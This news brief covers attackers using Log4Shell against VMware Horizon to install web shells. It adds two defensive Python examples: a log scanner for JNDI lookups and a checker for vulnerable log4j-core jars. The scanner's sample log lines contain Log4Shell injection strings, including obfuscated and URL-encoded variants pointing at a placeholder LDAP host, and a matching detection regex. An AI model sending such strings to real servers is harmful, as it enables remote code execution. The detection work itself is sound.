Dive Brief:
- NHS Digital, an information technology partner for the U.K. health system, said threat actors are targeting Log4Shell vulnerabilities in VMware Horizon to create web shells, which can be used to steal data, introduce additional malicious software or launch a ransomware attack.
- VMware Horizon is a widely used virtual desktop application that allows workers to operate remotely. VMware issued security updates for the software following the initial Log4j vulnerability disclosures in December. The NHS Digital alert did not specify whether the activity was related to activity seen within the health service or whether it involved other targets.
- "CISA is aware of the NHS alert regarding potential targeting of VMware products," a spokesperson for the Cybersecurity and Infrastructure Security Agency said via email. CISA is working with government and private industry officials to understand potential risks to federal agencies and critical infrastructure.
Dive Insight:
The attackers are likely using the Java Naming and Directory Interface (JNDI) during the initial reconnaissance phase as a callback method, delivered through Log4Shell payloads, according to NHS Digital. The Lightweight Directory Access Protocol (LDAP) is then used to execute a malicious Java class file that inserts a web shell into the VM Blast Secure Gateway service, the alert said.
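One way to hunt for the JNDI callback stage described above in gateway or web-server logs, as an added example that is not part of the NHS Digital alert or of any VMware tooling: the access-log lines below are constructed, `callback.invalid` is a reserved placeholder host, and the normalisation step handles only the handful of nested-lookup forms named in the comments, so it is a starting point for a detection rule rather than a complete one.

```python
import re
import urllib.parse

# Regexes for the nested-lookup forms that have been used to hide the "jndi" token
# from naive string matching. Each resolves one innermost lookup to its literal result:
#   ${lower:x} / ${upper:x}    -> x   (case is folded at the end anyway)
#   ${::-x}, ${env:NAME:-x}    -> x   (default value of an empty or missing lookup)
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")

# The token a detection actually wants: a JNDI lookup plus the scheme that follows it.
_JNDI = re.compile(r"\$\{jndi:([a-z]+)")


def normalise(text: str) -> str:
    """URL-decode, then collapse nested lookups until the string stops changing."""
    text = urllib.parse.unquote(text)
    previous = None
    while text != previous:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def find_jndi_lookups(lines):
    """Return (line_number, scheme) for every log line carrying a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalise(line))
        if match:
            hits.append((number, match.group(1)))
    return hits


# Constructed access-log lines in a generic combined format (not real NHS or VMware data);
# callback.invalid is a reserved placeholder host name.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Jan/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Jan/2022:10:01:07 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://callback.invalid:1389/a}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${lower:j}${::-n}di:${env:NOPE:-l}dap://callback.invalid:1389/a}"',
    '10.0.0.9 - - [12/Jan/2022:10:01:11 +0000] "GET /portal/?q=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.invalid%3A1389%2Fa%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for number, scheme in find_jndi_lookups(SAMPLE_LOG):
        print(f"line {number}: JNDI lookup via {scheme}")
```

The third and fourth sample lines are the reason the normalisation exists: a rule that only greps for the literal string `${jndi:` misses a lookup split across nested `${lower:}` and default-value lookups, and misses one that arrives URL-encoded in the request path. Matching on the scheme after normalisation also lets the same rule pick up the LDAP stage the alert describes without separate patterns per encoding.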
"We are supporting our partners with the system response to this critical vulnerability and will continue to provide guidance to NHS organizations," a spokesman for NHS said in an emailed statement. "This includes guidance on how to prevent and detect exploitation techniques that could be used by threat actors."
Government officials in the U.K. are working with U.S. and other allied agencies on efforts to fight the growing number of threat actors looking to take advantage of the Log4j vulnerability to launch attacks.
Security researchers from Microsoft, Mandiant, CrowdStrike, and other firms warned that various criminal and nation-state affiliates have launched reconnaissance and more direct attacks on targets in an attempt to exploit the Log4j vulnerability. The threat is considered extremely dangerous because attackers do not need a high level of sophistication or experience to initiate attacks with this vulnerability.
"What is most interesting, and makes this problem so pernicious, is that the vulnerability was uncovered in a subsystem of VMware Horizon, Apache Tomcat, which is a widely used application server," said Jonathan Care, Gartner senior research director. "Tomcat uses Log4j to perform logging services, and so the vulnerability is exposed."
In response to last week's NHS Digital alert, VMware issued a statement similar to the one it provided in December about how it prioritizes the security of its customers, and pointed to its Dec. 10 security advisory, VMSA-2021-0028. The company also noted that any internet-facing service that is not patched against CVE-2021-44228 and CVE-2021-45046 is vulnerable to attackers and should be patched.
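A small inventory check for the patch guidance in that statement, written as an added example rather than VMware's or Apache's own tooling: it reads the `log4j-core` version from a jar's Maven `pom.properties` and maps it to the two CVEs the statement names, using the affected ranges published on the Apache Log4j security page (2.0-beta9 through 2.14.1 for CVE-2021-44228; through 2.15.0 for CVE-2021-45046, with the 2.12.2+ and 2.3.1+ backport lines excluded). `build_sample_jar` constructs an in-memory fixture for the demonstration, and the version comparison is a simplification that is adequate for released 2.x version strings.

```python
import io
import zipfile
from pathlib import Path

# Maven metadata that a log4j-core jar carries; read it rather than trusting the file name.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Class whose removal from the jar was Apache's documented mitigation for deployments
# that could not upgrade immediately; its presence or absence is reported as a second signal.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"


def parse_version(version: str):
    """Turn '2.0-beta9' / '2.14.1' into a comparable tuple (pre-releases sort first)."""
    core, _, pre = version.partition("-")
    nums = tuple(int(part) for part in core.split("."))
    nums += (0,) * (3 - len(nums))
    return nums + ((0, pre) if pre else (1, ""))


FIRST_AFFECTED = parse_version("2.0-beta9")


def affected_cves(version: str):
    """Which of the two CVEs in the advisory a given log4j-core version is exposed to."""
    v = parse_version(version)
    if v < FIRST_AFFECTED:
        return []  # 1.x and pre-beta9 builds are outside the scope of these two CVEs
    # Java 7 and Java 6 backport lines: 2.12.2+ and 2.3.1+ shipped with both fixes
    if v[:2] == (2, 12) and v >= parse_version("2.12.2"):
        return []
    if v[:2] == (2, 3) and v >= parse_version("2.3.1"):
        return []
    cves = []
    if v <= parse_version("2.14.1"):
        cves.append("CVE-2021-44228")
    if v <= parse_version("2.15.0"):
        cves.append("CVE-2021-45046")
    return cves


def inspect_jar(jar_bytes: bytes):
    """Return (version, has_jndi_lookup_class), or (None, None) for a jar that is not log4j-core."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        if POM_PROPS not in names:
            return None, None
        version = None
        for line in jar.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            key, sep, value = line.partition("=")
            if sep and key.strip() == "version":
                version = value.strip()
        return version, JNDI_LOOKUP_CLASS in names


def scan_directory(root):
    """Walk a tree and report every log4j-core jar with its version, CVE exposure and lookup class."""
    findings = []
    for path in Path(root).rglob("*.jar"):
        version, has_lookup = inspect_jar(path.read_bytes())
        if version is not None:
            findings.append((str(path), version, affected_cves(version), has_lookup))
    return findings


def build_sample_jar(version: str, include_lookup_class: bool = True) -> bytes:
    """Constructed in-memory fixture shaped like log4j-core; not a real Apache artifact."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as jar:
        jar.writestr(POM_PROPS, f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion={version}\n")
        if include_lookup_class:
            jar.writestr(JNDI_LOOKUP_CLASS, b"")
    return buf.getvalue()


if __name__ == "__main__":
    for sample in ("2.14.1", "2.15.0", "2.16.0", "2.12.2"):
        version, has_lookup = inspect_jar(build_sample_jar(sample))
        print(version, affected_cves(version), "JndiLookup present" if has_lookup else "JndiLookup removed")
```

Run `scan_directory` over an application install tree to list every embedded copy of `log4j-core`; a product update that replaces one jar can leave another, bundled copy behind, which is why the check keys on the Maven metadata inside each jar rather than on the jar's file name. Treat the version mapping as current only for the two CVEs named in VMware's statement; later Log4j advisories carry their own ranges.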